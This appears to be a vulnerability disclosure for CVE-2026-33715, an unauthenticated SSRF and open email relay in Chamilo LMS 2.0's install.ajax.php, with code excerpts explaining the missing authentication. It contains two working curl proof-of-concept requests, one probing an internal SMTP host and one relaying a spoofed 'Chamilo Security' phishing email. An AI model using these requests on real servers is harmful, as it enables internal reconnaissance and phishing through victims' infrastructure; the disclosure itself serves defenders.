## https://sploitus.com/exploit?id=63B900F3-D8DD-56B1-A26C-C6F58869B0D7
# CVE-2026-33715 โ Unauthenticated SSRF + Open Email Relay in Chamilo LMS via install.ajax.php
**Severity**: High (CVSS 7.5)
**CWE**: CWE-918 (SSRF) + CWE-306 (Missing Authentication)
**Affected**: `chamilo/chamilo-lms` 2.0 (commit 0195b29 and earlier)
**Advisory**: GHSA-mxc9-9335-45mc
**NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-33715
---
## TL;DR
`install.ajax.php` in Chamilo LMS 2.0 is accessible without authentication on fully installed instances. Its `test_mailer` action accepts an arbitrary Symfony Mailer DSN and destination from POST data, allowing any unauthenticated attacker to force the server to initiate SMTP connections to arbitrary internal hosts (SSRF) and send emails through the Chamilo server as an open relay.
---
## Affected component
**File**: `public/main/inc/ajax/install.ajax.php`
The file was designed for the installation wizard but remains accessible after installation. Unlike every other AJAX endpoint in the same directory, it does **not** include `global.inc.php` โ meaning zero authentication, zero authorization check:
```php
// Line 18 โ only loads Composer autoloader, no auth
require_once __DIR__.'/../../../../vendor/autoload.php';
```
The `test_mailer` action (line ~138) accepts attacker-controlled POST parameters:
```php
case 'test_mailer':
$mailerDsn = (string) $request->request->get('mailerDsn'); // arbitrary SMTP DSN
$mailerTestDestination = (string) $request->request->get('mailerTestDestination'); // arbitrary email
// ...
$transport = Transport::fromDsn($mailerDsn); // connects to attacker's SMTP server
$mailer = new Mailer($transport);
$mailer->send($email); // sends email through it
```
**Compare with any properly protected endpoint:**
```php
// chat.ajax.php line 9 โ correct pattern
require_once __DIR__.'/../global.inc.php'; // enforces authentication
api_block_anonymous_users();
```
---
## Root cause
The file is served directly by Apache (`RewriteCond %{REQUEST_FILENAME} !-f` passes existing PHP files through, bypassing Symfony's security firewall). The absence of `global.inc.php` inclusion means no session, no auth, no installation-complete check.
---
## PoC
See [`poc.py`](./poc.py) for a full demonstration.
```bash
# SSRF โ force Chamilo to connect to internal SMTP server
curl -X POST "http:///main/inc/ajax/install.ajax.php?a=test_mailer" \
-d "mailerDsn=smtp://10.0.0.1:25" \
-d "mailerFromEmail=test@chamilo.org" \
-d "mailerFromName=Test" \
-d "mailerTestDestination=attacker@evil.com"
# Open relay โ send phishing email through the Chamilo server
curl -X POST "http:///main/inc/ajax/install.ajax.php?a=test_mailer" \
-d "mailerDsn=smtp://mail.chamilo.org:587" \
-d "mailerFromEmail=security@chamilo.org" \
-d "mailerFromName=Chamilo Security" \
-d "mailerTestDestination=victim@target-org.com"
```
---
## Impact
1. **SSRF** โ unauthenticated attacker forces the server to initiate SMTP connections to arbitrary internal hosts, enabling internal network reconnaissance and potential exploitation of internal mail servers
2. **Open email relay** โ the Chamilo server sends emails with attacker-controlled content to any destination, appearing to originate from the server's legitimate IP, damaging email reputation
3. **Information disclosure** โ SMTP error responses reveal internal network topology and service availability
---
## Timeline
- **Discovery**: 2026-03-22
- **Reported**: GHSA-mxc9-9335-45mc (private advisory)
- **CVE published**: CVE-2026-33715